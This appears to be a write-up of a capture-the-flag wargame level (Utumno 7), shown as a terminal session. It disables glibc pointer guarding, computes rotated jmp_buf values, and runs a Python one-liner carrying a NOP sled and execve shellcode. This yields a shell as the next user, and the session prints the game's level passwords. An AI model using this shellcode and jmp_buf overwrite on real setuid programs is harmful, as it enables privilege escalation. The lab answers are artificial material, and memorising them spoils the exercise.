utumno - 7

root@today:~/Desktop/misc/utumno/utumno6# ssh utumno7@178.79.134.250

utumno7@178.79.134.250's password: totiquegae

utumno7@melinda:~$ mkdir /tmp/utu7

utumno7@melinda:~$ cd /tmp/utu7

utumno7@melinda:~$ export LD_POINTER_GUARD=0
(LD_POINTER_GUARD
(glibc since 2.4) Set to 0 to disable pointer guarding. Any other value enables pointer guarding, which is also the default.
Pointer guarding is a security mechanism whereby some pointers to code stored in writable program memory (return addresses saved by
setjmp(3) or function pointers used by various glibc internals) are mangled semi-randomly to make it more difficult for an attacker
to hijack the pointers for use in the event of a buffer overrun or stack-smashing attack.)

# stack environment
---------
eip (rol eip, 0x09 ; rotation left 9bits)
---------
esp (rol esp, 0x09 ; rotation left 9bits)
---------
ebp
---------
edi
---------
esi
---------
ebx
--------- jmp_buf(esp + 0x90)

128B

--------- buffer(esp + 0x10)

#we use gdb to get the buffer address. it's 0xffffd420
#rol 0xffffd420,0x9 == 0xffa841ff
#we set jmp_buf.esp = 0xffa841ff, jmp_buf.eip = 0xffa841ff

utumno7@melinda:/tmp/utu7$ /utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`
^Z
[1]+  Stopped                 /utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`

utumno7@melinda:/tmp/utu7$ jobs -l
[1]+ 27875 Stopped                 /utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`

utumno7@melinda:/tmp/utu7$ kill -10 27875
utumno7@melinda:/tmp/utu7$ fg

/utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`
^Z
[1]+  Stopped                 /utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`

utumno7@melinda:/tmp/utu7$ kill -12 27875
utumno7@melinda:/tmp/utu7$ fg

/utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`
$ whoami
utumno8
$ cat /etc/utumno_pass/utumno8
jaeyeetiav
$